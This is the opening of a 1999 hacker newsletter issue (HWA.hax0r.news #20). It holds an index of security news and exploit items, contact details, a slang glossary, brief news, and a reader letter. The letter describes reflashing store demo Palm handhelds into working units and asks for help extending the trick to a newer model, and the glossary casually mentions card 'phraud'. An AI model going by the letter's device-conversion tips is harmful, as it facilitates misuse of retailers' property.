Copy Link
Add to Bookmark
Report
hwa-hn20
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 20 Volume 1 1999 May 29th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
"There are two major products that come out of Berkeley: LSD and UNIX.
We don't believe this to be a coincidence."
-Jeremy S. Anderson
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
and airportman for the Cubesoft bandwidth. Also shouts out to all our
mirror sites! tnx guys.
http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa
Synopsis
---------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #20
=-----------------------------------------------------------------------=
"It is possible to provide security against other ills, but as far as
death is concerned, we men live in a city without walls."
-Epicurus
We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #20
=--------------------------------------------------------------------------=
"Wars have never hurt anybody except the people who die."
-Salvador Dali
[ INDEX ]
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Clinton Authorizes Cyber Attack??? ..............................
03.1 .. More on the 'Cyberwar'...........................................
04.0 .. RootFest Scares Officials In Minneapolis ........................
05.0 .. Australia Admits to Echelon .....................................
06.0 .. Banks to Test Home User PC Security .............................
07.0 .. EMPEROR VIRUS....................................................
08.0 .. WINHLP32.EXE BUFFER OVERRUN......................................
09.0 .. NAI ON GALADRIEL VIRUS...........................................
10.0 .. Know your enemy parts 1,2 and 3..................................
11.0 .. Cox Report Blasts DOE Computer Security .........................
12.0 .. Black Hat Briefings Announced ...................................
13.0 .. eEYe Digital Security advisory: Multiple Web Interface Security Holes
14.0 .. Fun with ICQ.....................................................
15.0 .. FBI raids suspected hackers......................................
15.1 .. Real life hacker wargames........................................
16.0 .. MOD hacks Senate site............................................
17.0 .. Backdoor-G a new 'backorifice like' trojan and BO2K..............
18.0 .. [CNN] A Q&A with Emmanuel Goldstein, editor of 2600 magazine.....
19.0 .. [CNN] 'Hacking is a felony': Q&A with IBM's Charles Palmer.......
20.0 .. Five Busted in Florida ..........................................
21.0 .. Danes Finger Swede for Cracking 12,000 Systems ..................
22.0 .. EFA Plans Net Censorship Demonstrations..........................
23.0 .. Design Principals for Tamper-Resistant Smart Card Processors.....
24.0 .. Melissa finds a mate.............................................
25.0 .. punkz.com sets up a page for feedback on the presidential cyberwar
26.0 .. Its that time of month again, when the 26th rolls around, look out
27.0 .. Submission: "Be A Nice Hacker" by System.........................
28.0 .. Hacking Memes by Stephen Downes..................................
29.0 .. [ISN] House panel aims to bolster security law...................
30.0 .. [ISN] NSA Taps Universities For Info Security Studies............
31.0 .. [ISN] HushMail: free Web-based email with bulletproof encryption.
32.0 .. [ISN] E-Biz Bucks Lost Under SSL Strain..........................
33.0 .. [ISN] Bracing for guerrilla warfare in cyberspace................
34.0 .. [ISN] Prosecuting Lee Is Problematic.............................
35.0 .. [ISN] Slip of the Tongue Lightens up Encryption Hearing .........
36.0 .. [ISN] REVIEW: "Microsoft Windows NT 4.0 Security, Audit, and Control",
37.0 .. [ISN] LCI Intros SMARTpen Biometric Signature Authentication.....
38.0 .. [ISN] CFP: DISC 99 Computer Security 99..........................
39.0 .. [ISN] GAO: NASA systems full of holes............................
39.1 .. [ISN] Nasa vulnerabilities potentially deadly....................
40.0 .. Citrux Winframe client for Linux vulnerability...................
41.0 .. [ISN] Top 10 candidates for a "duh" list (general sec/crypto)....
42.0 .. Seeing invisible fields and avoiding them...the MicroAlarm.......
43.0 .. RelayCheck v1.0 scan for smtp servers that will relay mail.......
44.0 .. Admintool exploit for Solaris (Updated) by Shadow Penguin Security
45.0 .. AppManager 2.0 for NT from NetIQ displays passwords in cleartext
46.0 .. Cgichck99 ported to Rebol from Su1d Sh3ll's .c code..............
47.0 .. ICSA certifies weak crypto as secure.............................
48.0 .. RAS and RRAS vulnerability.......................................
49.0 .. Whitepaper:The Unforseen Consequences of Login Scripts By Dan Kaminsky
50.0 .. Vulnerability in pop2.imap.......................................
51.0 .. Infosec.19990526.compaq-im.a 'Compaq insight manager vulnerability'
52.0 .. Advisory: NT ODBC Remote Compromise...............................
53.0 .. Advisory: Buffer overflow in SmartDesk WebSuite v2.1..............
54.0 .. Security Leak with IBM Netfinity Remote Control Software..........
55.0 .. IBM eNetwork Firewall for AIX ....................................
=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: Aug19th-22nd Niagara Falls... .................
HA.HA .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. <a href="http://www.antionline.com/">http://www.antionline.com/</a>
Back Orifice/cDc..................<a href="http://www.cultdeadcow.com/">http://www.cultdeadcow.com/</a>
News site (HNN) .....,............<a href="http://www.hackernews.com/">http://www.hackernews.com/</a>
Help Net Security.................<a href="http://net-security.org/">http://net-security.org/</a>
News,Advisories,++ ...............<a href="http://www.l0pht.com/">http://www.l0pht.com/</a>
NewsTrolls .......................<a href="http://www.newstrolls.com/">http://www.newstrolls.com/</a>
News + Exploit archive ...........<a href="http://www.rootshell.com/beta/news.html">http://www.rootshell.com/beta/news.html</a>
CuD Computer Underground Digest...<a href="http://www.soci.niu.edu/~cudigest">http://www.soci.niu.edu/~cudigest</a>
News site+........................<a href="http://www.zdnet.com/">http://www.zdnet.com/</a>
News site+Security................<a href="http://www.gammaforce.org/">http://www.gammaforce.org/</a>
News site+Security................<a href="http://www.projectgamma.com/">http://www.projectgamma.com/</a>
News site+Security................<a href="http://securityhole.8m.com/">http://securityhole.8m.com/</a>
News site+Security related site...<a href="http://www.403-security.org/">http://www.403-security.org/</a>
News/Humour site+ ................<a href="http://www.innerpulse.com/>http://www.innerpulse.com</a>
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
<a href="http://www.cnn.com/SEARCH/">Link</a>
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
<a href="http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0">Link</a>
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
<a href="http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack">Link</a>
http://www.ottawacitizen.com/business/
<a href="http://www.ottawacitizen.com/business/">Link</a>
http://search.yahoo.com.sg/search/news_sg?p=hack
<a href="http://search.yahoo.com.sg/search/news_sg?p=hack">Link</a>
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
<a href="http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack">Link</a>
http://www.zdnet.com/zdtv/cybercrime/
<a href="http://www.zdnet.com/zdtv/cybercrime/">Link</a>
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
<a href="http://www.zdnet.com/zdtv/cybercrime/chaostheory/">Link</a>
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
<a href="http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm">Link</a>
http://freespeech.org/eua/ Electronic Underground Affiliation
<a href="http://freespeech.org/eua/">Link</a>
http://ech0.cjb.net ech0 Security
<a href="http://ech0.cjb.net">Link</a>
http://axon.jccc.net/hir/ Hackers Information Report
<a href="http://axon.jccc.net/hir/">Link</a>
http://net-security.org Net Security
<a href="http://net-security.org">Link</a>
http://www.403-security.org Daily news and security related site
<a href="http://www.403-security.org">Link</a>
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
<a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
And unofficially yet contributing too much to ignore ;)
Spikeman .........................: World media
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Kevin Mitnick (watch yer back) Dicentra
vexxation sAs72 Spikeman Astral
p0lix Vexx g0at security
Shouts to tekz from HK for asking nicely in eye-are-see! ;-)
and to t4ck for making my night albeit I couldn't stick around for
the rest of the comedy routine. hacked star dot star with phf huh?
.... ;-))
and the #innerpulse, crew and some inhabitants of #leetchans ....
although I use the term 'leet loosely these days, <k0ff><snicker> ;)
kewl sites:
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ THE FIRST TRUE CYPHERPUNK NOVEL (CULT. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/culture/story/19720.html
Two generations of swashbuckling geeks tackle the forces of
evil. Call it hip, call it funny. But you can't call it
light summer reading. Declan McCullagh reviews Neal Stephenson's Cryptonomicon.
(checkout www.cryptonomicon.com also - Ed)
++ STUDENTS ARRESTED
From HNS http://www.net-security.org/
by BHZ, Friday 28th May 1999 on 12.02 am CET
Five Flagler Palm Coast High School students - one the son of a Bunnell city
commissioner - are facing a litany of criminal charges after authorities said they used
a computer trojan to hack into the school's network and commandeer teacher and
student files. Flagler County sheriff's deputies arrested the students Monday. All five
were taken to the Division of Youth Services in Daytona Beach before being released
to their parents.
++ FIGHT THE CENSORSHIP
From HNS http://www.net-security.org/
by BHZ, Thursday 27th May 1999 on 9.53 pm CET
Yesterday, the Australian Senate passed legislation to censor the Internet. In order to
protest censorship people will join with like minded groups and individuals in a day of
action against censorship. Download flyers here and sure do visit Electronic Frontiers
Australia site.
http://www.anatomy.usyd.edu.au/danny/freedom/march/
http://www.efa.org.au
++ SMARTDESK WEBSUITE BUFFER OVERFLOW
From HNS http://www.net-security.org/
by BHZ, Thursday 27th May 1999 on 9.47 pm CET
As posted on BugTraq by cmart: "WebSuite v2.1 will crash when an additional 250+
characters is appended after the sites URL on NT Server 4 and NT Workstation 4
boxes. Running on top of Windows 98 it will crash with 150+ characters appended
after the sites URL. After reinstallating on both platforms several times, the overflow
string length varied. Approximately 1 out of 8 times the overflow string went from 150
chars (Win98) to about 1000+ chars. It also went from 250+ chars (NT) to about
2000+ chars".
++ GETTING ZAPPED FOR BETTER Z'S (TECH. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/19713.html
Relief is on the way for chronic snorers and their partners.
A new therapy uses radio waves to treat the breathing
disorder known as sleep apnea. By Kristen Philipkoski
Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Hacking the Palm Pilot demos...
Date: Thu, 20 May 1999 23:56:05 -0400
From: scosha@home.com
Organization: @Home Network
X-Mailer: Mozilla 4.51 [en]C-AtHome0404 (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: hwa@press.usmc.net
Subject: subject for newsleter
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
As we all know 3Com has recently released the Palm IIIx and V.
The Palm V demo in store displays is a dummy unit with a hunk of lead
inside.
On the other hand the Palm IIIx is a fully working unit. There is a
trick to make it work 100%. Like it's predecesor the Palm III the demo,
if you could get your hands on one was not hard to reflash the OS rom
and presto you had a Palm III worth $500.00 and there was little effort
involved.
The IIIx poses a little more difficulty. They have employed a new
strategy. 1st 3Com went with the new Ezball Motorola Dragon processor,
and put the Os in static non volitile memory. While it's not hard to
download a fresh copy of the OS from a real store bought IIIx, the trick
is in flashing the demo unit. The programs used to flash the III does
not work on the IIIx, all you will get is a 'wrong header card version'
message, which basiclly seals your fate. I have been working on trying
to flash the proper OS replacing the demo OS (which won't allow you to
input anything) to no avail. I put it out to the people who do these
things best. I know not what to do from here. I have a few insiders
helping but it is a much kept secret.
zzcrazyman
================================================================
@HWA
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
*Well things are moving along rather smoothly, its been a comparitively
*slow (but interesting) week on the news front with some FBI action coming
